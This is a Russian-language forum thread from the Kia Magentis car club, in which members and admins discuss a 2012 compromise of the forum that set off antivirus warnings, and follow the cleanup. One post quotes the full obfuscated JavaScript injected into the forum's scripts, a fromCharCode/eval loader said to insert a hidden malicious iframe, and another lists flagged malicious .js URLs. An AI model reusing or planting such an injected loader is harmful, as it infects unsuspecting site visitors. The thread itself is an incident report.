АВТОМОБИЛЬНЫЙ КЛУБ KIA MAGENTIS CLUB (KIA OPTIMA CLUB)

ПАРТНЕРЫ, БАРАХОЛКА, ТРЕП => РАБОТА САЙТА И ФОРУМА => Тема начата: Tim$ от 05 Апреля 2012, 13:53:24

Название: Это так у меня одного???
Отправлено: Tim$ от 05 Апреля 2012, 13:53:24
При переходе на родной сайт выдаёт такую картину:(http://content.foto.mail.ru/list/365150/1/i-80.jpg)
Чего это за фигня такая???
Название: Re: Это так у меня одного???
Отправлено: Sasha от 05 Апреля 2012, 13:58:54
типо вирус?
Название: Re: Это так у меня одного???
Отправлено: Tim$ от 05 Апреля 2012, 14:20:59
типо вирус?

пишет что с сайт рассылает вирусы, не знаю почему картинка такая маленькая получилась
Название: Re: Это так у меня одного???
Отправлено: Grazier от 05 Апреля 2012, 15:45:02
Уже вылечили, так что можете заходить.
Название: Re: Это так у меня одного???
Отправлено: KirBG от 05 Апреля 2012, 16:00:50
Ночью (около 5 утра) сервер подвергся нападению, было перезаписано часть файлов.  С утра (около 9:30) все файлы были перезаписаны в исходное состояние, однако некоторое время браузеры еще могут ругаться "по старой памяти".
Название: Re: Это так у меня одного???
Отправлено: Tim$ от 05 Апреля 2012, 16:07:32
Уже вылечили, так что можете заходить.

аа ну хорошо....
Название: Re: Это так у меня одного???
Отправлено: DAK от 07 Апреля 2012, 23:00:19
Дома аваст стал ругаться на сайт.
Название: Re: Это так у меня одного???
Отправлено: Tim$ от 08 Апреля 2012, 02:26:14
Мозила до сих пор такую хрень мне выдаёт ???  ???
Название: Re: Это так у меня одного???
Отправлено: Palach от 08 Апреля 2012, 12:59:16
каспер тоже вопит.
Название: Re: Это так у меня одного???
Отправлено: disasoft от 09 Апреля 2012, 15:03:08
Уважаемая Администрация!

Форум, похоже, все еще заражен и пытается запустить Java для заражения компьютеров пользователей.

Обратите внимание на подключаемые JavaScript из файлов
http://forum.club-magentis.ru/Themes/default/scripts/script.js?rc2
http://forum.club-magentis.ru/Themes/default/scripts/theme.js?rc2
http://forum.club-magentis.ru/Themes/default/scripts/sha1.js
http://forum.club-magentis.ru/Themes/default/scripts/topic.js
а также, возможно, другие скрипты, подгружаемые на других страницах.

Перечисленные скрипты содержат код, которого нет в оригинальных скриптах движка SMF. Более того, код обфусцирован, чтобы было непонятно, что он пытается сделать:

Цитировать
c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Date().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i81i73i13i16i17i62i64i6i59i64i76i68i71i69i76i72i67i75i6i64i71i69i61i62i76i72i6i70i61i76i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;692!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);


После расшифровки и исполнения этот код вставляет на страницу скрытый iframe с сайтом, пытающимся заразить компьютеры пользователей.
Название: Re: Это так у меня одного???
Отправлено: Grazier от 09 Апреля 2012, 16:32:17
Блин, админ уехал на неделю на Украину. Без него я сейчас ничего сделать не могу. Попытаюсь его выцепить. Пока всем рекомендую выключать ява-скрипты.
Название: Re: Это так у меня одного???
Отправлено: azat от 09 Апреля 2012, 17:43:51
у меня тоже ругаться начал - "троянская программа".
Название: Re: Это так у меня одного???
Отправлено: RuSlAn от 09 Апреля 2012, 19:12:00
У меня тож каспер матерится :D
Название: Re: Это так у меня одного???
Отправлено: zomb89 от 10 Апреля 2012, 08:58:41
лячить надо
Название: Re: Это так у меня одного???
Отправлено: slobdy от 10 Апреля 2012, 10:35:33
Бацилы веселятся! Сегодня уже другие:
10.04.2012 10:29:13   URL-адрес: http://jy9e1.hnxbptlmuf.servegame.org/g/8065332574792756.js   База подозрительных веб-адресов: обнаружено   
10.04.2012 10:33:02   URL-адрес: http://ayq589fh.chtlomtpks.homeftp.net/g/7203501818538267.js   База подозрительных веб-адресов: обнаружено   
10.04.2012 10:29:23   URL-адрес: http://jy9e1.hnxbptlmuf.servegame.org/g/701395120993411.js   База подозрительных веб-адресов: обнаружено   
10.04.2012 10:33:20   URL-адрес: http://jy9e1.hnxbptlmuf.servegame.org/g/309862693616833.js   База подозрительных веб-адресов: обнаружено   
10.04.2012 10:34:14   URL-адрес: http://ayq589fh.chtlomtpks.homeftp.net/g/924298140565428.js   База подозрительных веб-адресов: обнаружено   
Название: Re: Это так у меня одного???
Отправлено: RuSlAn от 10 Апреля 2012, 18:52:01
У меня уже всё в порядке :)
Название: Re: Это так у меня одного???
Отправлено: Grazier от 11 Апреля 2012, 12:10:28
Трояны долбят по прежнему, так и не могу дозвониться до админа
Название: Re: Это так у меня одного???
Отправлено: RuSlAn от 11 Апреля 2012, 15:00:29
Да, снова началось
Название: Re: Это так у меня одного???
Отправлено: Serjyoo от 11 Апреля 2012, 19:57:02
С домашнего компа не ругается, а вот с рабочего сразу кричит что всё... троян
Название: Re: Это так у меня одного???
Отправлено: Сан Саныч от 11 Апреля 2012, 21:45:47
Тоже
Название: Re: Это так у меня одного???
Отправлено: zomb89 от 12 Апреля 2012, 09:42:02
С домашнего компа не ругается, а вот с рабочего сразу кричит что всё... троян

 На домашнем наверно антивирус постарее))
Название: Re: Это так у меня одного???
Отправлено: Andrey от 12 Апреля 2012, 11:18:59
Всем доброго дня!!!!
При заходе на форум и перемещении по темам и страницам NOD ругается на троян!!!
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 12 Апреля 2012, 15:59:08
Тоже самое.(
Название: Re: Это так у меня одного???
Отправлено: mintelross от 14 Апреля 2012, 02:08:02
У меня тоже уже в третий день.
Название: Re: Это так у меня одного???
Отправлено: KirBG от 14 Апреля 2012, 08:06:12
Троян вылечен, постарался усилить безопасность :)
Извиняюсь, что так долго добирался до компа, его у меня просто не было.. :(
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 14 Апреля 2012, 23:31:33
сегодня было тоже самое(
Название: Re: Это так у меня одного???
Отправлено: KirBG от 14 Апреля 2012, 23:59:50
Хм.. у меня на одном компе касперский, на другом Нод, оба реагировали, но после лечения оба молчат.
Если говорить про яндекс, который "окрещивает" сайт опасным, то он снимет этот статус только после перепроверки, которая может пройти только через несколько дней.

Какой антивирус ругается и на что?
У кого-нибудь еще возникают предупреждения антивируса?
Название: Re: Это так у меня одного???
Отправлено: Tim$ от 15 Апреля 2012, 02:39:20
фаерфокс ругается при переходе на сайт, антивируса нет.... :-\ :D
Название: Re: Это так у меня одного???
Отправлено: KirBG от 15 Апреля 2012, 10:18:10
Фаерфокс с яндекс баром? Тогда скорее всего это из-за пометки яндекса. Например, браузер Яндекс.Интернет также ругается, только из-за того что связан с ним.
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 15 Апреля 2012, 12:43:03
У меня касперский энтернет секьюрити 2012.пишит что траянская и сайт вредит компьютеру.((
Название: Re: Это так у меня одного???
Отправлено: Tim$ от 15 Апреля 2012, 13:35:49
Фаерфокс с яндекс баром? Тогда скорее всего это из-за пометки яндекса. Например, браузер Яндекс.Интернет также ругается, только из-за того что связан с ним.

да ,с баром, че сделать то надо? :-\
Название: Re: Это так у меня одного???
Отправлено: azat от 15 Апреля 2012, 18:07:24
теперь NOD не ругается. похоже вылечили.
Название: Re: Это так у меня одного???
Отправлено: Grazier от 15 Апреля 2012, 19:59:11
Админ вернулся и поборол вирус, приношу всем извинения за возможность заражения.
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 15 Апреля 2012, 20:09:25
А у меня без изменения.(
Название: Re: Это так у меня одного???
Отправлено: KirBG от 15 Апреля 2012, 23:18:35
А у меня без изменения.(


Очень странно, возможно, интернет секьюрити тоже связан как-то с яндексом и получает от него информацию о подозрительных сайтах..  В любом случае, сайт отправлен в яндекс на перепроверку, должна пройти за несколько дней, если после этого секьюрити касперского продолжит ругаться, то будем думать. Антивирус касперского молчит.
да ,с баром, че сделать то надо? :-\

Ничего :) Ждем когда яндекс снимет пометку.
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 15 Апреля 2012, 23:37:33
Хорошо)
Название: Re: Это так у меня одного???
Отправлено: master01 от 16 Апреля 2012, 00:11:39
Symantec endpoint protection 12 успокоился наконец-то. А вот части аваторок я не вижу.
Название: Re: Это так у меня одного???
Отправлено: zomb89 от 16 Апреля 2012, 07:02:54
Symantec endpoint protection 12 успокоился наконец-то. А вот части аваторок я не вижу.

 Аналогично
Название: Re: Это так у меня одного???
Отправлено: Grazier от 16 Апреля 2012, 08:15:45
Мне свою аватару пришлось перезаливать.
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 16 Апреля 2012, 10:42:51
Не я вижу все аватарки,но ругается.
Название: Re: Это так у меня одного???
Отправлено: Grazier от 16 Апреля 2012, 11:09:58
Не я вижу все аватарки,но ругается.

Антивирус ругается или в браузере предупреждение?
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 16 Апреля 2012, 12:45:16
Антивирус теперь молчит.)А появляется вот такая картинка(
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 16 Апреля 2012, 12:48:05
У меня Мозила фирафокс.
Название: Re: Это так у меня одного???
Отправлено: Grazier от 16 Апреля 2012, 14:14:04
У меня Мозила фирафокс.

Это нормально, это предупреждение исчезнет через несколько дней, когда яндекс проиндексирует вирусную активность.
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 16 Апреля 2012, 14:24:30
Ясно)Хорошо)))
Название: Re: Это так у меня одного???
Отправлено: master01 от 16 Апреля 2012, 23:55:04
Часть залитых фотографий на форум пропала. Восстановить можно, или перезаливать?
Название: Re: Это так у меня одного???
Отправлено: KirBG от 17 Апреля 2012, 08:11:22
Часть залитых фотографий на форум пропала. Восстановить можно, или перезаливать?

Попробую восстановить, но пока не гарантирую :(
Название: Re: Это так у меня одного???
Отправлено: KirBG от 17 Апреля 2012, 11:50:29
Вложения и аватары восстановлены.
Название: Re: Это так у меня одного???
Отправлено: KirBG от 19 Апреля 2012, 23:20:25
"...Последняя проверка сайта не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.
---
С уважением,
Яндекс..."
 :)
Теперь фаерфокс не должен ругаться.
Название: Re: Это так у меня одного???
Отправлено: Екатерина от 20 Апреля 2012, 08:33:23
Ура,у меня все нормально)))
Название: Re: Это так у меня одного???
Отправлено: Tim$ от 20 Апреля 2012, 12:46:57
Вроде тоже больше не ругается!
Название: Re: Это так у меня одного???
Отправлено: SanchoS от 20 Апреля 2012, 21:27:20
Все нормульно, Firefox не ругается )
Название: Re: Это так у меня одного???
Отправлено: Grazier от 21 Апреля 2012, 22:38:32
Можете не дублировать, теперь ни у кого ругаться не будет. :)